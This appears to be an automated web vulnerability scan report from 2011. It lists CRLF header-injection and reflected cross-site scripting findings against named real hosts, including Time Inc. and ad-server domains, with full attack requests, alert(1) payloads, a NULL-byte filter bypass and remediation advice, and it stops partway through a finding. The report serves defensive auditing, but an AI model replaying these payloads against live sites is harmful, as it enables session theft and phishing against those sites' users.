HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the ES cookie is copied into the Set-Cookie response header. The payload 10bc5%0d%0ac7388fd636e was submitted in the ES cookie. This caused a response containing an injected HTTP header.
The value of the ES cookie is copied into the Set-Cookie response header. The payload 60b44%0d%0a1dbf3b28d86 was submitted in the ES cookie. This caused a response containing an injected HTTP header.
The value of the code request parameter is copied into the Location response header. The payload 25157%0d%0a7c98215d65e was submitted in the code parameter. This caused a response containing an injected HTTP header.
The value of the site request parameter is copied into the Location response header. The payload 616b0%0d%0acd664a2ced8 was submitted in the site parameter. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload c5071%0d%0adb9e40e93e6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c5071%0d%0adb9e40e93e6/mail/dnp/privacy_centralized.cgi/time?dnp_source=E HTTP/1.1 Host: cgi.timeinc.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest&x=0&y=0 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.pathfinder.c ...[SNIP]...
The value of REST URL parameter 4 is copied into the Location response header. The payload 5d495%0d%0a11171e271ae was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /cgi-bin/mail/dnp/5d495%0d%0a11171e271ae/time?dnp_source=E HTTP/1.1 Host: cgi.timeinc.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest&x=0&y=0 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://subscription.tim ...[SNIP]...
The value of REST URL parameter 5 is copied into the Location response header. The payload adc03%0d%0a65009c68769 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /cgi-bin/mail/dnp/privacy_centralized.cgi/adc03%0d%0a65009c68769?dnp_source=E HTTP/1.1 Host: cgi.timeinc.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest&x=0&y=0 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://subscription.tim ...[SNIP]...
2. Cross-site scripting (reflected)previous There are 78 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload fdb05<script>alert(1)</script>c67450030ae was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 14:16:15 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2509
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "755767fdb05<script>alert(1)</script>c67450030ae"
The value of the placementId request parameter is copied into an HTML comment. The payload 9d43e--><script>alert(1)</script>be28fd24e1f was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 14:20:12 GMT Vary: Accept-Encoding,User-Agent Content-Length: 3365 Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "13914279d43e--><script>alert(1)</script>be28fd24e1f" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload ea8d4--><script>alert(1)</script>64e83b686e4 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 14:20:33 GMT Vary: Accept-Encoding,User-Agent Content-Length: 3804 Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-1ea8d4--><script>alert(1)</script>64e83b686e4" -->
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453c5"><script>alert(1)</script>0603925a1fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0453c5"><script>alert(1)</script>0603925a1fd/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://drudgereport.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 199a0"><script>alert(1)</script>df5fd8c38aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235199a0"><script>alert(1)</script>df5fd8c38aa/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://drudgereport.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50d2f"><script>alert(1)</script>21443c2e9ce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/113160650d2f"><script>alert(1)</script>21443c2e9ce/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://drudgereport.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a57"><script>alert(1)</script>543e86ef6a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0d0a57"><script>alert(1)</script>543e86ef6a/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://drudgereport.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 293
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a95f2"><script>alert(1)</script>3db595fe01d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154a95f2"><script>alert(1)</script>3db595fe01d/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://drudgereport.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dbf9"><script>alert(1)</script>7d23282b3a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECH2dbf9"><script>alert(1)</script>7d23282b3a;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://drudgereport.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 293
The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebf35"><script>alert(1)</script>9556b7afb58 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001ebf35"><script>alert(1)</script>9556b7afb58 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://drudgereport.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
2.11. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe/3.0/5235/1131606/0/154/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d60db"><script>alert(1)</script>bc3a3c9803f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&d60db"><script>alert(1)</script>bc3a3c9803f=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://drudgereport.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 297
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 68bb7<script>alert(1)</script>1aa098db945 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ccc1b<script>alert(1)</script>98e30e33e4a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 37730<img%20src%3da%20onerror%3dalert(1)>18fe03cfb64 was submitted in the longUrl parameter. This input was echoed as 37730<img src=a onerror=alert(1)>18fe03cfb64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 15621<script>alert(1)</script>a006cc605e8 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Oct 2011 14:34:53 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 68b29<script>alert(1)</script>6aabb981620 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 56bed<script>alert(1)</script>e111db97095 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa2cc</script><script>alert(1)</script>6bb22505598 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ebf0</script><script>alert(1)</script>37cf171afc2 was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.20. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://d.tradex.openx.com
Path:
/afr.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fc03</script><script>alert(1)</script>58f5bcbff52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd50</script><script>alert(1)</script>3c853cdd483 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c89ff"><script>alert(1)</script>931bd4c1ff1 was submitted in the REST URL parameter 1. This input was echoed as c89ff"><script>alert(1)</script>931bd4c1ff1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004ce53"><script>alert(1)</script>e1f90b16954 was submitted in the REST URL parameter 2. This input was echoed as 4ce53"><script>alert(1)</script>e1f90b16954 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4c62'%3balert(1)//28451474222 was submitted in the mpck parameter. This input was echoed as b4c62';alert(1)//28451474222 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49a89"-alert(1)-"4df1bbdd434 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ac11"%3balert(1)//45013e6faf9 was submitted in the mpvc parameter. This input was echoed as 4ac11";alert(1)//45013e6faf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc5b9'%3balert(1)//1cd668fef70 was submitted in the mpvc parameter. This input was echoed as fc5b9';alert(1)//1cd668fef70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 85a9e<script>alert(1)</script>9b11c9e93dc was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 508ec<img%20src%3da%20onerror%3dalert(1)>615ba25ad1 was submitted in the request_id parameter. This input was echoed as 508ec<img src=a onerror=alert(1)>615ba25ad1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /bubble/?request_id=EEEXFUJYLF508ec<img%20src%3da%20onerror%3dalert(1)>615ba25ad1&respond_path=LINGO.connect&try=1&key=EEEXFUJYLF&lm=1317843032000&url=http%3A//www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005&title=Rick%20Perry%20Raises%20%2417%20Million%20in%20Third%20Quarter%20-%20Rebecca%20Kaplan%20-%20NationalJournal.com HTTP/1.1 Host: lingows.appspot.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: -1 content-type: text/javascript Vary: Accept-Encoding Date: Wed, 05 Oct 2011 14:31:51 GMT Server: Google Frontend Content-Length: 109
The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload 7c837<script>alert(1)</script>44b0427890c was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bubble/?request_id=EEEXFUJYLF&respond_path=LINGO.connect7c837<script>alert(1)</script>44b0427890c&try=1&key=EEEXFUJYLF&lm=1317843032000&url=http%3A//www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005&title=Rick%20Perry%20Raises%20%2417%20Million%20in%20Third%20Quarter%20-%20Rebecca%20Kaplan%20-%20NationalJournal.com HTTP/1.1 Host: lingows.appspot.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: -1 content-type: text/javascript Vary: Accept-Encoding Date: Wed, 05 Oct 2011 14:31:54 GMT Server: Google Frontend Content-Length: 107
2.31. http://moneyland.time.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://moneyland.time.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f94c"><script>alert(1)</script>ec15378cf14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f94c\"><script>alert(1)</script>ec15378cf14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Oct 2011 14:41:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://moneyland.time.com/xmlrpc.php Link: <http://wp.me/xxA6>; rel=shortlink Content-Length: 119197
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5b016<script>alert(1)</script>74d967ff502 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
